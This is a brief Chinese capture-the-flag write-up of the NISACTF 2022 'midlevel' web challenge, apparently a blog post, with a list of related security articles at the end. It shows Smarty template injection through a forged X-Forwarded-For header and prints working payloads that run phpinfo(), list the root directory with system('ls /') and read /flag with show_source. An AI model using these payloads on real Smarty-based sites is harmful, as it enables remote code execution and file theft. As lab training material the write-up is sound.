[NISACTF 2022]midlevel

[NISACTF 2022]midlevel wp

信息搜集

进入页面,右上角显示了我的真实 IP :

最下面提示:Build With Smarty ! :

Smarty 是 PHP 的模板引擎,判断为 Smarty 模板注入。

Smarty 模板注入

推荐博客:Smarty模板注入&CVE-2017-1000480

抓包,添加 XFF 头为 127.0.0.1,测试回显:

成功回显。

if 语句命令执行

if 语句内可以执行任意 PHP 代码,不要加分号。

复制代码
{if phpinfo()}{/if}

返回结果:

查看根目录下所有文件:

复制代码
if system('ls /')}{/if}

返回结果:

发现 flag 。

读取 flag 文件:

复制代码
{if show_source('/flag')}{/if}

返回结果:

拿到 flag 。

相关推荐
f0rev3r7 小时前
NewStarCTF2025-WEEK1
网络安全
Andya_net13 小时前
网络安全 | 深入了解 X.509 证书及其应用
服务器·安全·web安全
网安INF19 小时前
Python核心数据结构与函数编程
数据结构·windows·python·网络安全
骥龙21 小时前
2.8、权限的终极目标:提权与持久化
安全·网络安全
Andya_net1 天前
网络安全 | SSL/TLS 证书文件格式详解:PEM、CRT、CER、DER、PKI、PKCS12
安全·web安全·ssl
jieyu11191 天前
uploads-labs靶场通关(1)
web安全·文件上传漏洞·靶场通关
竹等寒2 天前
Linux-网络安全私房菜(二)
linux·服务器·web安全
f0rev3r2 天前
NewStarCTF2025-WEEK2
网络安全
缘友一世2 天前
深入理解Shell与反弹Shell:从原理到实战
linux·网络安全·shell
Whoami!2 天前
⸢ 捌-Ⅰ⸥⤳ 可信纵深防御应用实践:0Day漏洞 & 钓鱼攻击
网络安全·信息安全·纵深防御·案例实践